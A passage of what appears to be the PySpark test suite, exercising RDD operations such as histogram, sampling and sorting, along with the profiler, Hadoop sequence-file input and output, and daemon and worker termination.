rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEqual([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEqual([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEqual(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEqual(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEqual((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEqual([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEqual((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEqual(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEqual(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEqual(rdd.getNumPartitions(), 10)
self.assertEqual(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEqual(result.getNumPartitions(), 5)
self.assertEqual(result.count(), 3)
def test_external_group_by_key(self):
self.sc._conf.set("spark.python.worker.memory", "1m")
N = 200001
kv = self.sc.parallelize(xrange(N)).map(lambda x: (x % 3, x))
gkv = kv.groupByKey().cache()
self.assertEqual(3, gkv.count())
filtered = gkv.filter(lambda kv: kv[0] == 1)
self.assertEqual(1, filtered.count())
self.assertEqual([(1, N // 3)], filtered.mapValues(len).collect())
self.assertEqual([(N // 3, N // 3)],
filtered.values().map(lambda x: (len(x), len(list(x)))).collect())
result = filtered.collect()[0][1]
self.assertEqual(N // 3, len(result))
self.assertTrue(isinstance(result.data, shuffle.ExternalListOfList))
def test_sort_on_empty_rdd(self):
self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect())
def test_sample(self):
rdd = self.sc.parallelize(range(0, 100), 4)
wo = rdd.sample(False, 0.1, 2).collect()
wo_dup = rdd.sample(False, 0.1, 2).collect()
self.assertSetEqual(set(wo), set(wo_dup))
wr = rdd.sample(True, 0.2, 5).collect()
wr_dup = rdd.sample(True, 0.2, 5).collect()
self.assertSetEqual(set(wr), set(wr_dup))
wo_s10 = rdd.sample(False, 0.3, 10).collect()
wo_s20 = rdd.sample(False, 0.3, 20).collect()
self.assertNotEqual(set(wo_s10), set(wo_s20))
wr_s11 = rdd.sample(True, 0.4, 11).collect()
wr_s21 = rdd.sample(True, 0.4, 21).collect()
self.assertNotEqual(set(wr_s11), set(wr_s21))
def test_null_in_rdd(self):
jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc)
rdd = RDD(jrdd, self.sc, UTF8Deserializer())
self.assertEqual([u"a", None, u"b"], rdd.collect())
rdd = RDD(jrdd, self.sc, NoOpSerializer())
self.assertEqual([b"a", None, b"b"], rdd.collect())
def test_multiple_python_java_RDD_conversions(self):
# Regression test for SPARK-5361
data = [
(u'1', {u'director': u'David Lean'}),
(u'2', {u'director': u'Andrew Dominik'})
]
data_rdd = self.sc.parallelize(data)
data_java_rdd = data_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
# conversion between python and java RDD threw exceptions
data_java_rdd = converted_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
def test_narrow_dependency_in_join(self):
rdd = self.sc.parallelize(range(10)).map(lambda x: (x, x))
parted = rdd.partitionBy(2)
self.assertEqual(2, parted.union(parted).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, parted.union(rdd).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, rdd.union(parted).getNumPartitions())
tracker = self.sc.statusTracker()
self.sc.setJobGroup("test1", "test", True)
d = sorted(parted.join(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test1")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test2", "test", True)
d = sorted(parted.join(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test2")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test3", "test", True)
d = sorted(parted.cogroup(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test3")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test4", "test", True)
d = sorted(parted.cogroup(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test4")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
# Regression test for SPARK-6294
def test_take_on_jrdd(self):
rdd = self.sc.parallelize(xrange(1 << 20)).map(lambda x: str(x))
rdd._jrdd.first()
def test_sortByKey_uses_all_partitions_not_only_first_and_last(self):
# Regression test for SPARK-5969
seq = [(i * 59 % 101, i) for i in range(101)] # unsorted sequence
rdd = self.sc.parallelize(seq)
for ascending in [True, False]:
sort = rdd.sortByKey(ascending=ascending, numPartitions=5)
self.assertEqual(sort.collect(), sorted(seq, reverse=not ascending))
sizes = sort.glom().map(len).collect()
for size in sizes:
self.assertGreater(size, 0)
def test_pipe_functions(self):
data = ['1', '2', '3']
rdd = self.sc.parallelize(data)
with QuietTest(self.sc):
self.assertEqual([], rdd.pipe('cc').collect())
self.assertRaises(Py4JJavaError, rdd.pipe('cc', checkCode=True).collect)
result = rdd.pipe('cat').collect()
result.sort()
for x, y in zip(data, result):
self.assertEqual(x, y)
self.assertRaises(Py4JJavaError, rdd.pipe('grep 4', checkCode=True).collect)
self.assertEqual([], rdd.pipe('grep 4').collect())
class ProfilerTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
conf = SparkConf().set("spark.python.profile", "true")
self.sc = SparkContext('local[4]', class_name, conf=conf)
def test_profiler(self):
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
id, profiler, _ = profilers[0]
stats = profiler.stats()
self.assertTrue(stats is not None)
width, stat_list = stats.get_print_list([])
func_names = [func_name for fname, n, func_name in stat_list]
self.assertTrue("heavy_foo" in func_names)
old_stdout = sys.stdout
sys.stdout = io = StringIO()
self.sc.show_profiles()
self.assertTrue("heavy_foo" in io.getvalue())
sys.stdout = old_stdout
d = tempfile.gettempdir()
self.sc.dump_profiles(d)
self.assertTrue("rdd_%d.pstats" % id in os.listdir(d))
def test_custom_profiler(self):
class TestCustomProfiler(BasicProfiler):
def show(self, id):
self.result = "Custom formatting"
self.sc.profiler_collector.profiler_cls = TestCustomProfiler
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
_, profiler, _ = profilers[0]
self.assertTrue(isinstance(profiler, TestCustomProfiler))
self.sc.show_profiles()
self.assertEqual("Custom formatting", profiler.result)
def do_computation(self):
def heavy_foo(x):
for i in range(1 << 18):
x = 1
rdd = self.sc.parallelize(range(100))
rdd.foreach(heavy_foo)
class InputFormatTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(cls.tempdir.name)
cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc)
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
for v in maps:
self.assertTrue(v in em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
cname = u'org.apache.spark.api.python.TestWritable'
ec = [(u'1', {u'__class__': cname, u'double': 1.0, u'int': 1, u'str': u'test1'}),
(u'2', {u'__class__': cname, u'double': 2.3, u'int': 2, u'str': u'test2'}),
(u'3', {u'__class__': cname, u'double': 3.1, u'int': 3, u'str': u'test3'}),
(u'4', {u'__class__': cname, u'double': 4.2, u'int': 4, u'str': u'test4'}),
(u'5', {u'__class__': cname, u'double': 5.5, u'int': 5, u'str': u'test56'})]
self.assertEqual(clazz, ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
).collect())
self.assertEqual(unbatched_clazz, ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
oldconf = {"mapred.input.dir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
newconf = {"mapred.input.dir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
def test_binary_files(self):
path = os.path.join(self.tempdir.name, "binaryfiles")
os.mkdir(path)
data = b"short binary data"
with open(os.path.join(path, "part-0000"), 'wb') as f:
f.write(data)
[(p, d)] = self.sc.binaryFiles(path).collect()
self.assertTrue(p.endswith("part-0000"))
self.assertEqual(d, data)
def test_binary_records(self):
path = os.path.join(self.tempdir.name, "binaryrecords")
os.mkdir(path)
with open(os.path.join(path, "part-0000"), 'w') as f:
for i in range(100):
f.write('%04d' % i)
result = self.sc.binaryRecords(path, 4).map(int).collect()
self.assertEqual(list(range(100)), result)
class OutputFormatTests(ReusedPySparkTestCase):
def setUp(self):
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
shutil.rmtree(self.tempdir.name, ignore_errors=True)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = self.sc.sequenceFile(basepath + "/sfmap/").collect()
for v in maps:
self.assertTrue(v, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
for v in result:
self.assertTrue(v, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapred.output.dir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/olddataset/"}
result = self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect()
for v in result:
self.assertTrue(v, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.Text",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
@unittest.skipIf(sys.version >= "3", "serialize of array")
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = list(zip(x, y))
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/newdataset"}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class DaemonTests(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shutdown the worker
sock.send(b"\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
python_exec = sys.executable or os.environ.get("PYSPARK_PYTHON")
daemon = Popen([python_exec, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
